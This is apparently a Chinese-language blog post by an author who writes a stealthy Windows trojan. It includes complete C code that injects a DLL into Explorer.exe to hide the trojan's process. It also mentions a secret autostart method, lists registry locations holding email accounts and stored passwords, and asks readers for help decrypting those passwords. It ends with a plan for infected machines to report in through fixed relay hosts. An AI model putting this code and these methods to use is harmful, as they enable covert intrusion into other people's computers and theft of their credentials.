我写了这样一个Windows下的程序，服务器端没有进程，没有端口，开机自动运行，可以接收客户端发来的文件并执行文件。只有不被发现的木马才能长寿。木马能接收文件并且执行文件，就可以干任何事。比如搜集系统的信息，只要传一个搜集系统信息的程序，并且执行。其他各种需要的功能也可以写成相应的程序，发送并且执行。

　　隐藏进程
　　也就是为了在Win2K中的 Windows 任务管理器中看不到。把木马程序做为别的进程中的一个线程运行，这样在 Windows 任务管理器的进程中就看不到了。要达到这个目的，最简单易用的方法就是把木马程序放在一个dll中，另有一个程序负责将这个dll注入到其他进程，比如Explorer.exe进程中。负责注入dll的程序先用VirtualAllocEx(hRemoteProcess,...)在目标进程中分配一块儿内存，用WriteProcessMemory向该内存中写入要注入的dll的路径和名称，然后利用CreateRemoteThread在目标进程中创建一个线程，这个线程执行LoadLibraryW，并以刚才弄好的那块内存中的dll的路径和名称为参数。这样就使dll载入了目标进程的地址空间，dll的载入将执行dll。这里只是大概的说，详细可以看Jeffrey Richter 的 《WINDOWS核心编程》第22章，讲的很清楚。而且有非常好的附书的程序做范例22-ImgWalk，22-InjLib。这本书有 pdf 格式的，在网上找找就可以下载到。我也给出一个自己写的说明这种隐藏方法的程序，相对来说更清楚，更容易看明白。两部分，负责注入的叫NoProcessExe.exe，被注入的dll叫做NoProcessDll.dll。NoProcessExe.exe负责把NoProcessDll.dll注入到Explorer.exe进程中，NoProcessDll.dll中的程序首先获得所在进程的pid，然后用MessageBox打印出来，以证明它是在Explorer.exe进程中运行的。注意一下NoProcessDll.dll，NoProcessExe.exe 要放在同一目录下。Win2K,VC6使用没问题。
　　____________________________________________________________________________________________
　　//NoProcessExe
　　#include
　　#include
　　#include

　　#pragma comment (lib,"Advapi32.lib")

　　int APIENTRY WinMain(HINSTANCE hInstance,
　　HINSTANCE hPrevInstance,
　　LPSTR lpCmdLine,
　　int nCmdShow)
　　{
　　////////////////////////////////////////////////////////////
　　// 查找explorer.exe进程的pid //
　　////////////////////////////////////////////////////////////
　　DWORD pid;

　　HANDLE hSnapshot = NULL;

　　hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);

　　PROCESSENTRY32 pe;
　　pe.dwSize = sizeof(PROCESSENTRY32);

　　Process32First(hSnapshot,&pe);

　　do
　　{
　　if(strcmp(pe.szExeFile,"Explorer.exe")==0)
　　{
　　pid = pe.th32ProcessID;
　　break;
　　}
　　}
　　while(Process32Next(hSnapshot,&pe)==TRUE);

　　CloseHandle (hSnapshot);

　　////////////////////////////////////////////////////////////
　　// 把dll注入explorer.exe进程 //
　　////////////////////////////////////////////////////////////
　　PWSTR pszLibFileRemote = NULL;
　　HANDLE hRemoteProcess = NULL,hRemoteThread = NULL;

　　hRemoteProcess = OpenProcess(
　　PROCESS_QUERY_INFORMATION | // Required by Alpha
　　PROCESS_CREATE_THREAD | // For CreateRemoteThread
　　PROCESS_VM_OPERATION | // For VirtualAllocEx/VirtualFreeEx
　　PROCESS_VM_WRITE, // For WriteProcessMemory
　　FALSE, pid);

　　char CurPath[256];
　　GetCurrentDirectory(256,CurPath);
　　strcat(CurPath,"\\NoProcessDll.dll");

　　int len = (strlen(CurPath)+1)*2;
　　WCHAR wCurPath[256];
　　MultiByteToWideChar(CP_ACP,0,CurPath,-1,wCurPath,256);

　　pszLibFileRemote = (PWSTR)
　　VirtualAllocEx(hRemoteProcess, NULL, len, MEM_COMMIT, PAGE_READWRITE);

　　WriteProcessMemory(hRemoteProcess, pszLibFileRemote,
　　(PVOID) wCurPath, len, NULL);

　　PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)
　　GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

　　hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
　　pfnThreadRtn, pszLibFileRemote, 0, NULL);

　　return 0;
　　}
　　____________________________________________________________________________________________
　　//NoProcessDll
　　#include

　　BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
　　{
　　char szProcessId[64];

　　if (fdwReason == DLL_PROCESS_ATTACH)
　　{
　　//取得当前进程的pid，通过和 Windows 任务管理器中 的 pid
　　//进行比较可以知道这个dll在哪个进程中运行。
　　_itoa ( GetCurrentProcessId(), szProcessId, 10 );
　　MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK );
　　Sleep(1000);
　　}

　　HMODULE hDll;
　　hDll=GetModuleHandle("NoProcessDll.dll");
　　FreeLibrary(hDll);

　　return TRUE;
　　}
隐藏端口
　　曾经考虑过使用SPI( Service Provider Interface )。SPI可以在 Windows Sockets 2 API 下面加一层，可以进行处理。也许可以很方便的实现端口的隐藏。关于SPI可以看msdn中的介绍。《WINDOWS网络编程技术》第14章也有介绍。但由于资料太少了，我也没有很多时间去研究，最后没有使用。最终我自己找到了一种方法，详细可以看我的另一篇文章《木马隐藏端口的一种方法》。
　　开机自动运行
　　通过注册表，实现开机自动运行。但决不是HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和RunService 之类的。也不是文件类型关联。不会造成系统的负担。使用起来很舒服，知道的人应该不多吧。除非知道，否则很难找到并且删除它。是什么呢？呵呵，暂时保密。
　　一些有用的注册表项和API
　　计算机名
　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
　　CPU信息，Win2K下包括速度，型号，几块cpu。如果有多块儿会出现...\0,...\1等等
　　HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
　　outlook express 邮箱和用户名，0000000？根据情况。
　　HKEY_CURRENT_USER\Software\Microsoft\Internet Account
　　Manager\Accounts\00000001
　　邮箱密码和ie浏览器自动完成密码存放地，可惜里面的东西是加密的，我这里找到了能从里面读出明文的程序，等有时间了会看看怎么弄，有知道的朋友麻烦您帮助一下我。
　　HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\
　　获得计算机名，实际上就是从注册表里读。API: GetComputerName 判断计算机是否在线。API:InetIsOffline

　　一些设想
　　关于木马主机上线通知，我有一个设想。就是首先寻找几台，固定IP并且长时间在线的机器，然后写一个服务程序，让他们运行。其他主机一旦上线，就向某台主主机发送上线信息，如果发送没有收到回应，就向备用主机发送上线信息。而我们运行一个客户端，可以到那几台主机上取得上线信息。就是说，找到几台固定ip并且不下线的主机，让他们做我们的服务器，其他上线的时候，向这几台服务器发信息，服务器保存起来。我们想知道在线信息的时候随时可以去去。这些只是一些设想。